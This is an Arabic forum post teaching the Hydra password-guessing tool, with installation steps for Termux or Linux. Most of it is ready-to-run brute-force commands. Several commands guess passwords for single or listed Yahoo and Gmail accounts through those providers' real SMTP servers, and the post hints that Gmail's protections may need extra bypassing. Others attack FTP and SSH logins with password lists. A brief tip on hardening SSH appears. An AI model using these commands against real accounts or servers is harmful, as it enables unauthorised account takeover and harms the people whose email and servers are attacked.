شرح أداة Hydra لهجوم التخمين على البروتوكولات!

x32x01
  • بواسطة x32x01 ||
أداة Hydra من أشهر وأقوى أدوات هجوم التخمين (Brute Force) في مجال اختبار الاختراق 💻
الأداة سريعة جدًا وبتدعم عدد كبير من البروتوكولات زي SMTP - FTP - SSH وده اللي مخليها منتشرة بين مختبري الاختراق.

Hydra فكرتها بسيطة: بتجرب عدد كبير من كلمات المرور أو أسماء المستخدمين لحد ما توصل للداتا الصح، وده بيخليها أداة مهمة في اختبار تأمين السيرفرات والخدمات ⚠️

ليه أداة Hydra قوية ومميزة؟ 🚀​

  • سريعة مقارنة بكتير أدوات تانية
  • بتدعم بروتوكولات كتير
  • بتشتغل على Linux و Termux
  • مناسبة لاختبار الاختراق الأخلاقي 🛡️

تخمين حسابات Yahoo باستخدام SMTP 📧​

تخمين حساب واحد​

Code: 
hydra -S -l email@yahoo.com -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp
📌 الأمر ده بيستخدم:
  • -l لتحديد إيميل واحد
  • -P ملف كلمات المرور
  • SMTP كبروتوكول الاستهداف

تخمين أكتر من حساب Yahoo (قائمة إيميلات)​

Code: 
hydra -S -L emaillist.txt -P passlist.txt -e ns -V -s 465 smtp.mail.yahoo.com smtp
هنا بنستخدم -L بدل -l علشان نمرر ملف فيه أكتر من إيميل 👥

تخمين حسابات Gmail باستخدام SMTP 📩​

حساب Gmail واحد​

Code: 
hydra -S -l email@gmail.com -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp

قائمة حسابات Gmail​

Code: 
hydra -S -L email.txt -P passlist.txt -e ns -V -s 465 smtp.gmail.com smtp
⚠️ خلي بالك إن Gmail عنده أنظمة حماية قوية، فمش دايمًا الأوامر دي بتنجح بدون تجاوزات إضافية.

هجوم التخمين على بروتوكول FTP 📂​

اسم مستخدم واحد​

Code: 
hydra -S -l username -P passlist.txt -e ns -V -s 21 server_ip ftp

قائمة أسماء مستخدمين​

Code: 
hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 21 server_ip ftp
📌 بروتوكول FTP من أكتر البروتوكولات اللي بتتعرض لهجمات تخمين لو مش متأمنة كويس.

هجوم التخمين على بروتوكول SSH 🔑​

مستخدم واحد​

Code: 
hydra -S -l username -P passlist.txt -e ns -V -s 22 server_ip ssh

قائمة مستخدمين​

Code: 
hydra -S -L listusername.txt -P passlist.txt -e ns -V -s 22 server_ip ssh
🛑 يفضل دايمًا تأمين SSH بتغيير البورت واستخدام مفاتيح بدل الباسورد.

تثبيت أداة Hydra على Termux أو Linux 🛠️​

Code: 
pkg update && pkg upgrade -y
pkg install hydra -y
بعد التثبيت تقدر تبدأ تستخدم الأداة مباشرة في اختبار الاختراق الأخلاقي.
 
التعديل الأخير:
المواضيع ذات الصلة
x32x01
شرح أداة Dirsearch لتخمين مسارات صفحات المواقع
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
x32x01
أداة BeEF لاختراق المتصفحات واختبار XSS
  • x32x01
الردود
0
المشاهدات
926
x32x01
x32x01
x32x01
أوامر Termux الأساسية: قائمة سريعة للمبتدئين!
  • x32x01
الردود
0
المشاهدات
2K
x32x01
x32x01
x32x01
شرح تثبيت أداة الميتاسبلويت على Termux وحل مشاكل الحزم
  • x32x01
الردود
0
المشاهدات
810
x32x01
x32x01
x32x01
شرح أداة sqlmap واستغلال ثغرات SQL Injection
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
الدخول أو التسجيل السريع
نسيت كلمة مرورك؟
آخر المشاركات
أحدث المنتجات
إحصائيات المنتدى
المواضيع
2,300
المشاركات
2,511
أعضاء أكتب كود
554
أخر عضو
عبدالله
عودة
أعلى